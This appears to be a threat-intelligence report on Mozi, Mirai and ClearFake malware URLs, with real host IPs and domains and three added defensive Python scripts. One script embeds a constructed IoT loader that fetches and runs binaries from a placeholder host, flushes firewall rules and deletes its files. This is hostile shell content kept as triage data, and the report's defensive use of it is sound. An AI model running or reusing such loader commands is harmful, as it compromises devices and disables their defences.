On April 21, 2026, threat intelligence monitoring identified 51 active malware distribution URLs tracked by abuse.ch URLhaus. The threat landscape is dominated by IoT-targeting malware families, with the Mozi and Mirai botnets accounting for the majority of family-attributed activity (24 of the 28 attributed URLs). ClearFake also remains active, relying on social engineering through fake browser-update lures hosted on dedicated domains. Apart from the ClearFake URLs, which serve browser-delivered payloads over HTTPS, the identified infrastructure consists of payload-hosting endpoints serving shell scripts and ELF binaries built to compromise Linux-based IoT devices.
The geographic distribution of malicious infrastructure spans multiple regions, with significant concentrations in Asian IP space. Shell script downloaders (bin.sh) are the primary first-stage delivery mechanism: they run on devices that have already been compromised, typically through weak credentials or a known vulnerability, and fetch the architecture-specific bot binaries in a second stage. The ClearFake campaign rotates subdomains under the 'wate7pugnac.in.net' and 'overfeed-social.in.net' zones while keeping a fixed UUID path component. No critical vulnerabilities, law enforcement actions, or policy updates were reported during this period.
Organizations operating IoT devices, edge infrastructure, and Linux-based systems should prioritize network segmentation, replace default credentials and enforce strong authentication, and monitor for unusual outbound connections to the IP addresses and ranges listed below. The sustained activity of Mozi, despite the earlier disruption of its original infrastructure, indicates that the botnet continues to operate through its decentralized peer-to-peer mechanism.
Mozi and Mirai account for 24 of the 51 active malicious URLs, all distributing malware that targets Linux-based IoT devices
16 active URLs distributing Mozi botnet malware via shell scripts and ELF binaries. Mozi compromises IoT devices by exploiting weak credentials and known vulnerabilities and maintains its botnet through a DHT-based peer-to-peer network rather than fixed command-and-control servers, which is why it survives the loss of individual hosts. Observed hosting spans addresses in the 42.x, 27.x, 125.x and 182.x blocks, largely allocated to Chinese networks, as well as other Asian regions.
8 active URLs associated with Mirai botnet variants distributing malware to compromised IoT devices. Observed hosting addresses are 153.3.11.210, 222.127.48.186, 94.244.36.34, 183.214.149.164, 180.243.65.33, 175.152.157.149, 27.189.30.220, and 58.23.74.213. Mirai continues to target default credentials and unpatched vulnerabilities in routers, IP cameras, and DVRs.
4 HTTPS URLs identified distributing ClearFake malware through the domains 'wate7pugnac.in.net' and 'overfeed-social.in.net'. ClearFake typically presents a fake browser-update prompt to persuade the user to run its payload. The same UUID path component (05fe317c-0981-4de2-bc8a-930d369db441) appears in all four URLs, which suggests a single coordinated campaign. Observed subdomains include 'faststep5', 'cle-arbox6', 'open-wind1', and 'soft-cha-ir2'.
23 additional malware distribution URLs were identified without a family attribution. The hosts are predominantly compromised or attacker-controlled machines serving shell scripts and binaries on high-numbered ports (36000-60000 range), consistent with IoT botnet payload staging. Geographic distribution includes IPs across Asia-Pacific, Europe, and Latin America.
Analysis of malware delivery mechanisms and infection chains observed in active campaigns
Most IoT malware campaigns use a bin.sh shell script as the first-stage downloader. These scripts typically change into a writable directory, fetch one binary per supported CPU architecture with wget or curl, mark each one executable and run it, then delete the files; many also disable local defenses (for example by flushing firewall rules) and establish persistence before the bot begins its botnet communications. Short generic paths such as '/i' suggest payload hosts that serve a single index-style binary rather than per-target files.
Multiple samples specifically identified as 32-bit ELF MIPS binaries indicate targeting of router and embedded-device architectures. MIPS-based devices include consumer routers, enterprise networking equipment, and industrial control systems, which makes them high-value botnet recruitment targets.
Malicious hosts consistently serve payloads on non-standard high-numbered ports (36000-60000 range). This choice evades egress rules that only restrict well-known ports, and the spread of port numbers across hosts may indicate automated loader tooling that picks a random listening port per host.
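As an added example that is not part of the report, the following Python script performs static triage of a captured first-stage downloader: it extracts the payload endpoints, infers which architectures are being fetched from the file names, and flags the loader behaviours described above (staging in a writable directory, remote fetch, chmod, firewall flush, self-cleanup). The sample script is constructed here; its host 192.0.2.10 (RFC 5737 documentation range), port and file names are placeholders, not indicators from the report.

```python
import re
from typing import Dict, Set, Tuple

# Constructed sample modelled on the bin.sh loader pattern described above.
# The host 192.0.2.10 (RFC 5737 documentation range), the port and the file
# names are placeholders, not indicators from the report.
SAMPLE_BIN_SH = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
wget http://192.0.2.10:39031/mips -O mips; chmod +x mips; ./mips router
wget http://192.0.2.10:39031/mipsel -O mipsel; chmod 777 mipsel; ./mipsel router
/bin/busybox wget http://192.0.2.10:39031/arm7 -O arm7; chmod +x arm7; ./arm7 router
curl -s http://192.0.2.10:39031/x86 -o x86; chmod +x x86; ./x86 router
iptables -F
rm -rf mips mipsel arm7 x86
"""

# host, optional :port, optional path; stops at whitespace and shell separators
URL_RE = re.compile(r"https?://([^/\s:'\";|&]+)(?::(\d+))?(/[^\s'\";|&]*)?")
# Payload names that loaders conventionally use for per-architecture builds.
ARCH_NAMES = {"mips", "mipsel", "arm", "arm5", "arm6", "arm7", "x86", "x86_64",
              "i586", "i686", "sh4", "ppc", "m68k", "sparc", "arc"}
# Behaviours whose co-occurrence in a short script is a strong loader signal.
SIGNALS = {
    "writable_staging_dir": re.compile(r"\bcd\s+/(tmp|var/run|dev/shm|mnt)\b"),
    "remote_fetch": re.compile(r"\b(wget|curl|tftp|ftpget)\b"),
    "mark_executable": re.compile(r"\bchmod\s+(\+x|7[0-7]{2})\b"),
    "firewall_flush": re.compile(r"\biptables\s+-F\b"),
    "self_cleanup": re.compile(r"\brm\s+-rf?\b"),
}


def analyze_loader(script: str) -> Dict[str, object]:
    """Extract payload endpoints and loader behaviours from a first-stage shell script."""
    endpoints: Set[Tuple[str, int]] = set()
    archs: Set[str] = set()
    for host, port, path in URL_RE.findall(script):
        endpoints.add((host, int(port) if port else 80))
        name = (path or "/").rsplit("/", 1)[-1].lower()
        if name in ARCH_NAMES:
            archs.add(name)
    signals = [name for name, rx in SIGNALS.items() if rx.search(script)]
    high_ports = sorted({p for _, p in endpoints if p >= 1024})
    # Verdict: fetching builds for several architectures plus at least three
    # loader behaviours is the pattern the report describes; one download alone
    # is not enough to call a script a loader.
    verdict = "iot-loader" if len(archs) >= 2 and len(signals) >= 3 else "inconclusive"
    return {
        "endpoints": sorted(endpoints),
        "architectures": sorted(archs),
        "high_ports": high_ports,
        "signals": signals,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in analyze_loader(SAMPLE_BIN_SH).items():
        print(f"{key:14s} {value}")
```

The endpoint and port lists feed directly into the network hunting described later in this report, while the architecture list tells an analyst which binaries to pull for further triage.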
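As an added illustration (not code from the report or from URLhaus), the following Python triages downloaded payloads by parsing the ELF identification bytes and the e_machine field, so that 32-bit MIPS samples of either endianness can be separated from other architectures before sandboxing. The sample headers are constructed inside the script and are not real malware.

```python
import struct
from typing import Dict, Optional

ELF_MAGIC = b"\x7fELF"
# e_machine values from the ELF specification for architectures common in IoT payloads.
E_MACHINE = {
    2: "sparc", 3: "x86", 4: "m68k", 8: "mips", 20: "ppc", 40: "arm",
    42: "sh", 62: "x86-64", 183: "aarch64",
}
E_TYPE = {1: "REL", 2: "EXEC", 3: "DYN"}


def classify_elf(data: bytes) -> Optional[Dict[str, object]]:
    """Return class, endianness, machine and type from an ELF header, or None if not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None  # malformed identification bytes
    endian = "<" if ei_data == 1 else ">"
    # e_type and e_machine are the two 16-bit fields right after the 16-byte e_ident.
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "machine": E_MACHINE.get(e_machine, f"unknown({e_machine})"),
        "type": E_TYPE.get(e_type, f"other({e_type})"),
    }


def is_mips32(data: bytes) -> bool:
    """True for the 32-bit MIPS payloads (either endianness) called out in the report."""
    info = classify_elf(data)
    return info is not None and info["bits"] == 32 and info["machine"] == "mips"


def make_elf_header(bits: int, big_endian: bool, e_machine: int, e_type: int = 2) -> bytes:
    """Build a minimal constructed ELF header for testing; this is not a real sample."""
    ident = ELF_MAGIC + bytes([1 if bits == 32 else 2, 2 if big_endian else 1, 1]) + b"\x00" * 9
    endian = ">" if big_endian else "<"
    return ident + struct.pack(endian + "HHI", e_type, e_machine, 1)


# Constructed inputs standing in for the files a loader script would fetch.
SAMPLES = {
    "mips": make_elf_header(32, True, 8),     # big-endian MIPS, typical for routers
    "mipsel": make_elf_header(32, False, 8),  # little-endian MIPS
    "arm7": make_elf_header(32, False, 40),
    "x86_64": make_elf_header(64, False, 62),
    "bin.sh": b"#!/bin/sh\nwget http://192.0.2.10/i\n",  # the shell loader itself
}


def triage(samples: Dict[str, bytes]) -> Dict[str, str]:
    """Label each sample as 'mips32', 'elf:<machine>/<bits>' or 'not-elf'."""
    labels = {}
    for name, data in samples.items():
        info = classify_elf(data)
        if info is None:
            labels[name] = "not-elf"
        elif is_mips32(data):
            labels[name] = "mips32"
        else:
            labels[name] = f"elf:{info['machine']}/{info['bits']}"
    return labels


if __name__ == "__main__":
    for name, label in triage(SAMPLES).items():
        print(f"{name:8s} {label}")
```

Reading only the first 20 bytes is enough for this decision, which matters when payloads are pulled in bulk; a full ELF parser is only needed once a sample is selected for deeper analysis.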
Recommended indicators and detection strategies based on observed threat activity
Monitor for outbound HTTP connections from IoT devices to high-numbered ports (36000-60000 range), especially requests for the paths '/i' and '/bin.sh'. Investigate connections from embedded Linux devices to the Asian IP ranges prominent in this dataset (particularly the 27.x, 42.x, 113.x, 125.x, 175.x and 182.x blocks); these /8 blocks also host legitimate services, so treat a match as an investigation trigger rather than a block list. Establish baseline traffic profiles for IoT devices to detect anomalous communication patterns.
Block or monitor domains matching '*.wate7pugnac.in.net' and '*.overfeed-social.in.net', including the apex domains themselves. Look for HTTPS requests whose path contains a UUID segment followed by a file with the 'ck-' prefix posing as Google-related content. User education should emphasize that legitimate browser updates are delivered through the browser's own update mechanism and never require a manual download from a third-party domain.
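As an added example that is not part of the report, the following Python implements both recommendations above as detection rules over constructed egress-proxy log lines. The IoT rule flags plain-HTTP requests from inventory-tagged IoT devices to the 36000-60000 port range, to the '/i' and '/bin.sh' paths, or into the listed /8 blocks; the ClearFake rule matches the two domains (including subdomains) and the UUID-then-'ck-' path shape. The key=value log layout, the 'iot-' device naming convention, the internal addresses and the 'ck-google-update.js' filename are assumptions of this example; the destination address and domain in the first three lines are indicators from the report.

```python
import ipaddress
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed egress-proxy log lines in a key=value layout. The layout, device
# names and internal addresses are assumptions of this example; the 'ck-'
# filename and the last two destinations are made up.
LOG_LINES = [
    "ts=2026-04-21T03:12:07Z src=10.20.4.31 dev=iot-camera-07 url=http://27.189.30.220:39031/bin.sh",
    "ts=2026-04-21T03:12:09Z src=10.20.4.31 dev=iot-camera-07 url=http://27.189.30.220:39031/i",
    "ts=2026-04-21T08:44:51Z src=10.20.9.12 dev=ws-finance-03 url=https://faststep5.wate7pugnac.in.net/05fe317c-0981-4de2-bc8a-930d369db441/ck-google-update.js",
    "ts=2026-04-21T09:01:00Z src=10.20.9.12 dev=ws-finance-03 url=https://update.example.com/v2/manifest.json",
    "ts=2026-04-21T09:15:33Z src=10.20.4.40 dev=iot-dvr-02 url=http://198.51.100.7:8080/status",
]

IOT_DEVICE_PREFIX = "iot-"  # asset-inventory naming convention assumed here
HIGH_PORTS = range(36000, 60001)
LOADER_PATHS = {"/i", "/bin.sh"}
WATCHED_BLOCKS = [ipaddress.ip_network(f"{b}.0.0.0/8") for b in (27, 42, 113, 125, 175, 182)]
CLEARFAKE_DOMAINS = ("wate7pugnac.in.net", "overfeed-social.in.net")
CLEARFAKE_PATH = re.compile(
    r"^/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/ck-", re.IGNORECASE)
KV = re.compile(r"(\w+)=(\S+)")


def parse_line(line: str) -> Dict[str, str]:
    """Split a key=value log line into a record."""
    return dict(KV.findall(line))


def iot_loader_rule(rec: Dict[str, str]) -> List[str]:
    """Reasons an IoT device's plain-HTTP request looks like a loader fetch."""
    if not rec.get("dev", "").startswith(IOT_DEVICE_PREFIX):
        return []
    u = urlsplit(rec["url"])
    if u.scheme != "http":
        return []
    reasons = []
    port = u.port or 80
    if port in HIGH_PORTS:
        reasons.append(f"high port {port}")
    if u.path in LOADER_PATHS:
        reasons.append(f"loader path {u.path}")
    try:
        ip = ipaddress.ip_address(u.hostname or "")
    except ValueError:
        ip = None  # a hostname rather than a literal address
    if ip is not None and any(ip in net for net in WATCHED_BLOCKS):
        reasons.append(f"watched block {ip}")
    return reasons


def clearfake_rule(rec: Dict[str, str]) -> List[str]:
    """Reasons a request matches the ClearFake domain or UUID/ck- path pattern."""
    u = urlsplit(rec["url"])
    host = (u.hostname or "").lower()
    reasons = []
    if any(host == d or host.endswith("." + d) for d in CLEARFAKE_DOMAINS):
        reasons.append(f"known domain {host}")
    if CLEARFAKE_PATH.match(u.path):
        reasons.append("uuid/ck- path")
    return reasons


RULES = {"iot_loader": iot_loader_rule, "clearfake": clearfake_rule}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over every line; a rule fires when it returns at least one reason."""
    alerts = []
    for idx, line in enumerate(lines):
        rec = parse_line(line)
        if "url" not in rec:
            continue
        for name, rule in RULES.items():
            reasons = rule(rec)
            if reasons:
                alerts.append({"line": idx, "rule": name, "dev": rec.get("dev"), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in scan(LOG_LINES):
        print(f"line {a['line']} {a['rule']:10s} {a['dev']}: {', '.join(a['reasons'])}")
```

Because the /8 blocks are broad, the IoT rule returns a list of reasons rather than a single verdict: a lone 'watched block' hit warrants a look, while a high port, a loader path and a watched block together (as in the first two lines) is a confident loader fetch. The ClearFake path check is deliberately independent of the domain check so that it keeps firing when the campaign rotates to new domains but keeps the same URL shape.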